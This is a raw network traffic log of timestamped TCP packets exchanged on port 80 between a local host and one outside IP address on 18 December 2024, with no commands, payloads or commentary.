Dec 18, 2024 13:38:20.536963940 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.537014008 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.537939072 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.537972927 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.537995100 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.538008928 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.538042068 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.538846016 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.538903952 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.538949013 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.539062977 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.539824963 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.539877892 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.539887905 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.539942980 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.540864944 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.540920019 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.540996075 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.541048050 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.541887045 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.541937113 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.655823946 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.655858040 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.655915022 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.655951023 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.656331062 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.656383038 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.656388044 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.656436920 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.657248974 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.657305002 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.657337904 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.657392979 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.658374071 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.658427954 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.658447981 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.658529043 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.659521103 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.659576893 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.659622908 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.659674883 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.660321951 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.660377026 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.660379887 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.660430908 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.661186934 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.661237955 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.661242008 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.661293983 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.662091970 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.662144899 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.662235022 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.662297964 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.663029909 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.663079977 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.663163900 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.663220882 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.663990021 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.664047956 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.664063931 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.664113998 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.664916039 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.664973974 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.665072918 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.665126085 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.665822983 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.665878057 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.665966034 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.666018009 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.666856050 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.666913986 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.666949034 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.666999102 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.667793989 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.667856932 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.667954922 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.668019056 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.668632030 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.668689013 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.668719053 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.668737888 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.669584036 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.669640064 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.669699907 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.669751883 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.670732975 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.670785904 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.670908928 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.670958042 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.671696901 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.671751976 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.672135115 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.672193050 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.672569036 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.672622919 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.672720909 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.672781944 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.673378944 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.673428059 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.673600912 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.673649073 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.674428940 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.674496889 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.674571037 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.674632072 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.675242901 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.675295115 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.675585985 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.675637960 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.676218987 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.676271915 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.676311970 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.676359892 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.677045107 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.677100897 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.677148104 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.677196980 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.677930117 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.677989960 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.678024054 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.678073883 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.678832054 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.678886890 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.678975105 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.679724932 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.679778099 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.679799080 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.679853916 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.680584908 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.680636883 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.680711985 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.680763960 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.681540966 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.681593895 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.681636095 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.681689978 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.682434082 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.682487011 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.682573080 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.682622910 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.683433056 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.683487892 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.683535099 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.683588028 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.684374094 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.684427977 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.684456110 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.684505939 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.685249090 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.685302973 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.685333967 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.685425043 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.686486959 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.686538935 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.686552048 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.686604977 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.687406063 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.687462091 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.687536001 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.687587023 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.688250065 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.688306093 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.688311100 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.688364983 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.688915014 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.688971996 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.689009905 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.689064026 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.689851999 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.689903021 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.690005064 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.690057039 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.690759897 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.690819025 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.690879107 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.690929890 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.691673994 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.691728115 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.691756964 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.691807032 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.692611933 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.692665100 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.692712069 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.692755938 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.693594933 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.693645954 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.693670988 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.693720102 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.694499016 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.694551945 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.694571018 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.694618940 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.695358992 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.695406914 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.695497990 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.695545912 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.696319103 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.696413040 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.696453094 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.696502924 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.697261095 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.697331905 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.697335958 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.697381020 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.698141098 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.698196888 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.698246002 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.698287964 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.699048042 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.699101925 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.699177027 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.699223042 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.699986935 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.700047016 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.700092077 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.700144053 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.701112986 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.701164961 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.701209068 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.701260090 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.701831102 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.701883078 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.701968908 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.702019930 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.702785969 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.702841043 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.702846050 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.702899933 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.703785896 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.703839064 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.703970909 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.704021931 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.704646111 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.704695940 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.847712994 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.847779989 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.847839117 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.847879887 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.848242044 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.848283052 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.848283052 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.848325014 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.849179029 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.849232912 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.849320889 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.849462986 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.850243092 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.850296021 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.850397110 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.850438118 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.851277113 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.851346016 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.851386070 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.851428986 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.852205992 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.852248907 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.852340937 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.852387905 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.853256941 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.853307009 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.853517056 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.853558064 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.854084015 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.854163885 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.854182959 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.854224920 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.854835033 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.854882002 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.855113029 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.855155945 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.855701923 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.855743885 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.855752945 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.855799913 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.856462955 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.856512070 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.856573105 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.856614113 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.857537031 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.857587099 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.857666969 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.857713938 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.858689070 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.858781099 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.858808041 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.858856916 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.859643936 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.859704018 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.859740973 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.859788895 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.860351086 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.860399008 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.860424042 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.860471010 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.861161947 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.861213923 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.861229897 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.861273050 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.862051010 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.862101078 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.862138033 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.862184048 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.862947941 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.862997055 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.863120079 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.863173008 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.863853931 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.863907099 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.863990068 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.864065886 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.864769936 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.864823103 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.864886045 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.864928007 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.865725040 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.865789890 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.865863085 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.865910053 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.866641045 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.866694927 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.866740942 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.866784096 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.867563963 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.867611885 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.867639065 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.867708921 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.868478060 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.868555069 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.868556023 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.868599892 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.869385958 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.869435072 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.869493008 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.869538069 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.870336056 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.870388031 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.870455980 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.870502949 CET	49710	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:20.871227026 CET	80	49710	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:20.871274948 CET	49710	80	192.168.2.8	31.41.244.11
